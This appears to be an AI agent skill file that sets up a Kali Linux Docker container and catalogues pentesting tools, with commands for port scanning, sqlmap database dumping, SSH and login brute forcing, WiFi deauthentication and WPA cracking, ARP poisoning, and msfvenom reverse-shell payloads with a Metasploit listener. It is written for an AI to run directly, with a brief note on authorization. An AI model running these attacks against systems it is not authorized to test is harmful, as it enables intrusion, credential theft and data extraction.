Comprehensive pentesting toolkit using Kali Linux Docker container. Provides direct access to 200+ security tools without MCP overhead. Use when conducting security assessments, penetration testing, vulnerability scanning, or security research. Works via direct docker exec commands for maximum efficiency.

## Install

```bash
npx skillscat add kroegha/kali-docker-pentesting
```

Install via the SkillsCat registry.
# Kali Docker Pentesting Skill

## Overview

This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via bash_tool, making it 70% more token-efficient.
## Container Management

### Starting the Container

```bash
# Basic start
docker run -d --name kali \
  -v $(pwd)/workspace:/workspace \
  -v $(pwd)/results:/results \
  kali-comprehensive

# With network capabilities (for actual scanning)
docker run -d --name kali \
  -v $(pwd)/workspace:/workspace \
  -v $(pwd)/results:/results \
  --cap-add=NET_RAW \
  --cap-add=NET_ADMIN \
  --network host \
  kali-comprehensive

# With GUI access (VNC)
docker run -d --name kali \
  -v $(pwd)/workspace:/workspace \
  -p 5900:5900 \
  -p 3389:3389 \
  kali-comprehensive
```

### Running Commands

```bash
# Execute single command
docker exec kali [tool] [options]

# Interactive shell
docker exec -it kali /bin/bash

# Note: shell redirects (>) and globs (*) on a docker exec line are expanded
# by the host shell, not inside the container. Wrap such commands in
# `sh -c '...'` so they run against the container's filesystem.

# Copy files out
docker cp kali:/results/scan.txt ./output/

# Copy files in
docker cp ./wordlist.txt kali:/workspace/
```

### Container Lifecycle

```bash
# Stop container
docker stop kali

# Start existing container
docker start kali

# Remove container
docker rm kali

# View logs
docker logs kali
```

## Tool Catalog
### 🔍 Network Discovery & Scanning

#### nmap - Network Mapper

Description: Industry-standard network scanner for host discovery, port scanning, and service detection.

Usage:

```bash
# Basic scan
docker exec kali nmap 192.168.1.1

# Service version detection
docker exec kali nmap -sV 192.168.1.1

# OS detection
docker exec kali nmap -O 192.168.1.1

# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1

# Save results
docker exec kali nmap -sV -oA /results/scan 192.168.1.0/24
```

Common Options:

- `-sS` - SYN stealth scan
- `-sT` - TCP connect scan
- `-sU` - UDP scan
- `-sV` - Version detection
- `-O` - OS detection
- `-A` - Aggressive scan (OS, version, scripts, traceroute)
- `-p-` - Scan all 65535 ports
- `-Pn` - Skip ping (assume host is up)
- `-T4` - Faster timing (0-5)
- `-oA` - Output all formats
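The `-oA` option writes three files, and the greppable one (`scan.gnmap`) is the easiest to turn into an inventory or into the plain host list that a later `nmap -iL` stage expects. The parser below is an added example and not part of this skill; it reads a `.gnmap` file (path given as the first argument, otherwise a constructed sample embedded in the script) and assumes the standard greppable layout of `Host:` lines with `Status:` and `Ports:` fields.

```python
"""Turn nmap greppable output (.gnmap from -oA) into a host inventory.

Added example for the kali-docker-pentesting skill, not the skill's own
code. Runs on /results/<name>.gnmap after `docker cp` or directly on the
mounted results volume. The sample below is constructed, not real output.
"""
import ipaddress
import re
import sys

# Host: <ip> (<hostname>)<TAB>Status: Up
# Host: <ip> (<hostname>)<TAB>Ports: 22/open/tcp//ssh//OpenSSH 9.2p1/, ...<TAB>Ignored State: ...
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+(.*)$")

SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.1.1 (gateway.lan)\tStatus: Up
Host: 192.168.1.1 (gateway.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 9.2p1/, 80/open/tcp//http//nginx 1.22.1/, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (999)
Host: 192.168.1.30 ()\tStatus: Down
# Nmap done -- 256 IP addresses (2 hosts up) scanned
"""


def parse_gnmap(text):
    """Return {ip: {"hostname", "up", "ports": [(port, proto, service, version)]}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # "# Nmap ..." comment lines and blanks
        ip, name, rest = m.groups()
        entry = hosts.setdefault(ip, {"hostname": name, "up": False, "ports": []})
        for field in rest.split("\t"):
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value.strip() == "Up"
            elif key == "Ports":
                for spec in value.split(", "):
                    # port/state/proto/owner/service/rpc-info/version/
                    parts = spec.strip().split("/")
                    if len(parts) < 7 or parts[1] != "open":
                        continue  # keep only open ports
                    entry["up"] = True  # a port line implies the host answered
                    entry["ports"].append((int(parts[0]), parts[2], parts[4], parts[6]))
    return hosts


def live_hosts(hosts):
    """Live IPs in address order: one per line is what `nmap -iL` consumes."""
    return sorted((ip for ip, h in hosts.items() if h["up"]), key=ipaddress.ip_address)


def write_host_list(hosts, path):
    """Write the live-host list for the next scan stage; returns the count."""
    ips = live_hosts(hosts)
    with open(path, "w") as fh:
        fh.write("\n".join(ips) + "\n")
    return len(ips)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    inventory = parse_gnmap(text)
    for ip in live_hosts(inventory):
        h = inventory[ip]
        ports = ", ".join(f"{p}/{proto} {svc} {ver}".strip() for p, proto, svc, ver in h["ports"])
        print(f"{ip:15} {h['hostname'] or '-':20} {ports or '(no open ports listed)'}")
```

Run it as `python3 gnmap_inventory.py results/scan.gnmap`, or call `write_host_list(parse_gnmap(text), "results/hosts.txt")` to produce the file a follow-up `nmap -iL /results/hosts.txt` stage reads.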
#### masscan - Fast Port Scanner

Description: Extremely fast port scanner, can scan the entire internet in under 6 minutes.

Usage:

```bash
# Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080

# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000

# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /results/masscan.txt
```

#### netdiscover - Network Discovery
Description: Active/passive ARP reconnaissance tool.

Usage:

```bash
# Passive mode
docker exec kali netdiscover -p -i eth0

# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24
```

#### arp-scan - ARP Scanner
Description: Discovers IPv4 hosts using ARP.

Usage:

```bash
docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24
```

### 🌐 Web Application Testing
#### nikto - Web Server Scanner

Description: Web server vulnerability scanner.

Usage:

```bash
# Basic scan
docker exec kali nikto -h http://target.com

# SSL scan
docker exec kali nikto -h https://target.com -ssl

# Save results
docker exec kali nikto -h http://target.com -o /results/nikto.txt

# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde
```

#### dirb - Directory Brute Forcer
Description: Web content scanner.

Usage:

```bash
# Default wordlist
docker exec kali dirb http://target.com

# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt

# Save results
docker exec kali dirb http://target.com -o /results/dirb.txt

# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt
```

#### gobuster - Directory/DNS Enumeration
Description: Fast directory and DNS enumeration tool.

Usage:

```bash
# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt
```

#### wfuzz - Web Fuzzer
Description: Web application fuzzer.

Usage:

```bash
# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ

# Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ

# POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
```

#### sqlmap - SQL Injection Tool
Description: Automatic SQL injection and database takeover tool.

Usage:

```bash
# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"

# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump

# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all
```

#### wpscan - WordPress Scanner
Description: WordPress vulnerability scanner.

Usage:

```bash
# Basic scan
docker exec kali wpscan --url http://target.com

# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u

# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p

# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe
```

#### whatweb - Website Fingerprinting
Description: Identifies websites and web technologies.

Usage:

```bash
# Basic scan
docker exec kali whatweb http://target.com

# Aggressive mode
docker exec kali whatweb -a 3 http://target.com

# Scan multiple URLs
docker exec kali whatweb -i /workspace/urls.txt
```

### 🔐 Password Attacks
#### john - John the Ripper

Description: Fast password cracker.

Usage:

```bash
# Crack with default wordlist
docker exec kali john /workspace/hashes.txt

# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /workspace/hashes.txt

# Crack specific format
docker exec kali john --format=raw-md5 /workspace/hashes.txt

# Show cracked passwords
docker exec kali john --show /workspace/hashes.txt

# Incremental mode
docker exec kali john --incremental /workspace/hashes.txt
```

#### hashcat - Advanced Password Recovery
Description: World's fastest password cracker.

Usage:

```bash
# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt

# Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

# Show results
docker exec kali hashcat -m 0 hashes.txt --show
```

Hash Modes:

- 0 = MD5
- 100 = SHA1
- 1400 = SHA256
- 1700 = SHA512
- 1000 = NTLM
- 3200 = bcrypt
#### hydra - Network Password Cracker

Description: Fast network logon cracker.

Usage:

```bash
# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http
```

#### medusa - Parallel Password Cracker
Description: Speedy, parallel, modular login brute-forcer.

Usage:

```bash
# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh

# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http
```

#### crunch - Wordlist Generator
Description: Generates custom wordlists.

Usage:

```bash
# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /results/wordlist.txt

# Custom charset
docker exec kali crunch 4 6 0123456789 -o /results/numbers.txt

# Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /results/pattern.txt
```

### 📡 Wireless Security
#### aircrack-ng - WiFi Security Suite

Description: Complete suite for assessing WiFi network security.

Usage:

```bash
# Start monitor mode
docker exec kali airmon-ng start wlan0

# Capture packets
docker exec kali airodump-ng wlan0mon

# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon

# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
```

#### wifite - Automated Wireless Attack
Description: Automated wireless attack tool.

Usage:

```bash
# Automatic WPA attack
docker exec kali wifite --wpa

# All attack types
docker exec kali wifite

# Specific target
docker exec kali wifite -i wlan0 --kill
```

#### reaver - WPS Attack
Description: Brute force WPS PINs.

Usage:

```bash
docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
```

### 🕵️ Information Gathering
#### theharvester - Email/Subdomain Harvester

Description: Gather emails, subdomains, IPs from public sources.

Usage:

```bash
# Search all sources
docker exec kali theharvester -d target.com -b all

# Specific source
docker exec kali theharvester -d target.com -b google

# Save results
docker exec kali theharvester -d target.com -b all -f /results/harvest
```

#### dnsrecon - DNS Enumeration
Description: DNS enumeration and network reconnaissance.

Usage:

```bash
# Standard enumeration
docker exec kali dnsrecon -d target.com

# Zone transfer
docker exec kali dnsrecon -d target.com -a

# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt
```

#### sublist3r - Subdomain Enumeration
Description: Fast subdomain enumeration using OSINT.

Usage:

```bash
# Basic enumeration
docker exec kali sublist3r -d target.com

# Enable brute force
docker exec kali sublist3r -d target.com -b

# Save results
docker exec kali sublist3r -d target.com -o /results/subdomains.txt
```

#### enum4linux - SMB Enumeration
Description: Tool for enumerating information from Windows and Samba systems.

Usage:

```bash
# Full enumeration
docker exec kali enum4linux -a 192.168.1.1

# User enumeration
docker exec kali enum4linux -U 192.168.1.1

# Share enumeration
docker exec kali enum4linux -S 192.168.1.1
```

#### dmitry - Deep Information Gathering
Description: Deepmagic Information Gathering Tool.

Usage:

```bash
# Full scan
docker exec kali dmitry -winsepo /results/dmitry.txt target.com

# Subdomain search
docker exec kali dmitry -s target.com
```

### 🛡️ Exploitation Frameworks
#### metasploit-framework - Penetration Testing Framework

Description: The world's most used penetration testing framework.

Usage:

```bash
# Start msfconsole
docker exec -it kali msfconsole

# Generate payload (use -o so the file is written inside the container;
# a host-side "> /results/..." redirect would land on the host instead)
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /results/payload.exe

# Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"

# Run resource script
docker exec kali msfconsole -r /workspace/script.rc
```

Common msfvenom payloads:

```bash
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk
```

#### social-engineer-toolkit (SET)
Description: Social engineering penetration testing framework.

Usage:

```bash
# Start SET
docker exec -it kali setoolkit
```

### 🔬 Forensics & Analysis
#### binwalk - Firmware Analysis

Description: Analyze and extract firmware images.

Usage:

```bash
# Scan for embedded files
docker exec kali binwalk /workspace/firmware.bin

# Extract files
docker exec kali binwalk -e /workspace/firmware.bin

# Signature scan
docker exec kali binwalk --signature /workspace/file.bin
```

#### foremost - File Carving
Description: Recover files based on headers and footers.

Usage:

```bash
# Recover all file types
docker exec kali foremost -i /workspace/image.dd -o /results/recovered

# Specific file types
docker exec kali foremost -t jpg,png,pdf -i /workspace/image.dd -o /results/
```

#### volatility - Memory Forensics
Description: Advanced memory forensics framework.

Usage:

```bash
# Get image info
docker exec kali volatility -f /workspace/memory.dump imageinfo

# List processes
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 pslist

# Dump process
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /results/
```

#### strings - Extract Strings
Description: Extract printable strings from files.

Usage:

```bash
# Basic extraction (sh -c keeps the redirect inside the container)
docker exec kali sh -c 'strings /workspace/binary > /results/strings.txt'

# Minimum length 10
docker exec kali strings -n 10 /workspace/binary

# Unicode strings
docker exec kali strings -e l /workspace/binary
```

#### exiftool - Metadata Extraction
Description: Read and write meta information in files.

Usage:

```bash
# View metadata
docker exec kali exiftool /workspace/image.jpg

# Remove all metadata
docker exec kali exiftool -all= /workspace/image.jpg

# Batch process (sh -c so the glob expands inside the container)
docker exec kali sh -c 'exiftool /workspace/*.jpg'
```

### 🔄 Reverse Engineering
#### ghidra - Software Reverse Engineering

Description: NSA's software reverse engineering framework.

Usage:

```bash
# GUI mode (requires X11 forwarding)
docker exec -it kali ghidra

# Headless mode: <project directory> <project name> -import <binary>
docker exec kali analyzeHeadless /workspace project -import /workspace/binary.exe
```

#### radare2 - Reverse Engineering Framework
Description: Advanced reverse engineering framework.

Usage:

```bash
# Open binary
docker exec -it kali r2 /workspace/binary

# Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /workspace/binary"

# Disassemble
docker exec kali r2 -c 'pd 10' /workspace/binary
```

#### gdb - GNU Debugger
Description: Standard debugger for Unix systems.

Usage:

```bash
# Debug binary
docker exec -it kali gdb /workspace/binary

# With PEDA
docker exec -it kali gdb -q /workspace/binary
```

### 🎯 Vulnerability Assessment
#### lynis - Security Auditing

Description: Security auditing tool for Unix/Linux systems.

Usage:

```bash
# Full audit
docker exec kali lynis audit system

# Quick scan
docker exec kali lynis audit system --quick
```

#### nikto - Web Vulnerability Scanner

(See Web Application Testing section)

#### openvas - Vulnerability Scanner

Description: Full-featured vulnerability scanner.

Usage:

```bash
# Start OpenVAS (requires initialization)
docker exec kali openvas-start
```

### 📊 Network Analysis
#### tcpdump - Packet Capture

Description: Command-line packet analyzer.

Usage:

```bash
# Capture on interface
docker exec kali tcpdump -i eth0

# Capture to file
docker exec kali tcpdump -i eth0 -w /results/capture.pcap

# Read file
docker exec kali tcpdump -r /results/capture.pcap

# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'
```

#### tshark - Network Protocol Analyzer
Description: Terminal-based Wireshark.

Usage:

```bash
# Capture packets
docker exec kali tshark -i eth0

# Capture to file
docker exec kali tshark -i eth0 -w /results/capture.pcap

# Filter display
docker exec kali tshark -r /results/capture.pcap -Y 'http.request'
```

#### ettercap - Network Sniffer/Interceptor
Description: Comprehensive suite for MITM attacks.

Usage:

```bash
# Text mode
docker exec -it kali ettercap -T -i eth0

# ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
```

## Common Pentesting Workflows
### 1. Network Reconnaissance

```bash
# Step 1: Discover live hosts
# (-oA writes hosts.nmap, hosts.gnmap and hosts.xml; -iL below needs a plain
#  one-IP-per-line list, so build /results/hosts.txt from hosts.gnmap first)
docker exec kali nmap -sn 192.168.1.0/24 -oA /results/hosts

# Step 2: Port scan discovered hosts
docker exec kali nmap -sV -p- -iL /results/hosts.txt -oA /results/ports

# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /results/services
```

### 2. Web Application Assessment
```bash
# Step 1: Identify web technologies
docker exec kali whatweb http://target.com

# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /results/dirs.txt

# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /results/nikto.txt

# Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch
```

### 3. Password Cracking Workflow
```bash
# Step 1: Generate wordlist
# (with -t, min and max length must equal the pattern length: 8 here)
docker exec kali crunch 8 8 -t Pass@@@@ -o /results/wordlist.txt

# Step 2: Crack hashes
docker exec kali john --wordlist=/results/wordlist.txt /workspace/hashes.txt

# Step 3: Network service brute force
docker exec kali hydra -L /workspace/users.txt -P /results/wordlist.txt ssh://192.168.1.1
```

### 4. Wireless Network Assessment
```bash
# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0

# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon

# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon

# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
```

### 5. Exploitation Workflow
```bash
# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49

# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /results/payload.exe

# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"
```

## File Management
### Copying Files Between Host and Container

```bash
# Copy TO container
docker cp ./local-file.txt kali:/workspace/

# Copy FROM container
docker cp kali:/results/scan.txt ./output/

# Copy directory
docker cp kali:/results/ ./output/
```

### Working with Wordlists
Common Wordlist Locations:

- `/usr/share/wordlists/rockyou.txt` - Most popular password list
- `/usr/share/wordlists/dirb/common.txt` - Common directories
- `/usr/share/seclists/` - SecLists collection
- `/usr/share/wordlists/metasploit/` - Metasploit wordlists

```bash
# List available wordlists
docker exec kali find /usr/share/wordlists -type f

# Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
```

## Troubleshooting
### Container Won't Start

```bash
# Check logs
docker logs kali

# Remove and recreate
docker rm kali
docker run -d --name kali kali-comprehensive
```

### Network Issues

```bash
# Use host network
docker run -d --name kali --network host kali-comprehensive

# Add network capabilities
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
```

### Permission Issues

```bash
# Run as root (already default)
docker exec -u root kali [command]

# Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results
```

### Metasploit Database Issues

```bash
# Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init

# Check status
docker exec kali msfdb status
```

## Best Practices
### 1. Always Save Results

```bash
# Use output flags
-o filename.txt          # Generic output
-oA basename             # Nmap: all formats
-w filename              # Write to file
> /results/output.txt    # Shell redirect (inside the container, via sh -c)
```

### 2. Use Volumes for Persistence

Mount volumes for:

- `/workspace` - Working files
- `/results` - Scan results
- `/wordlists` - Custom wordlists

### 3. Scope Your Testing

Always:

- Get written authorization
- Define scope boundaries
- Document everything
- Report findings responsibly

### 4. Clean Up After Testing

```bash
# Stop monitor mode
docker exec kali airmon-ng stop wlan0mon

# Clear temporary files (sh -c so the glob expands inside the container,
# not against the host's /tmp)
docker exec kali sh -c 'rm -rf /tmp/*'

# Archive results (the glob and $(date) are evaluated inside the container)
docker exec kali sh -c 'tar -czf /results/assessment-$(date +%Y%m%d).tar.gz /results/*.txt'
```

## Quick Reference
### Port Scanning

```bash
docker exec kali nmap -sV -p- target
```

### Directory Enumeration

```bash
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
```

### SQL Injection

```bash
docker exec kali sqlmap -u "http://target/page?id=1" --batch
```

### Password Cracking

```bash
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

### Network Brute Force

```bash
docker exec kali hydra -l admin -P passwords.txt ssh://target
```

### WiFi Cracking

```bash
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap
```

## When to Use This Skill
Use this skill when:

- Conducting authorized penetration testing
- Performing security assessments
- Testing network security
- Analyzing web applications
- Cracking passwords (authorized)
- Wireless security auditing
- Forensics analysis
- Reverse engineering
- Learning security techniques

Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.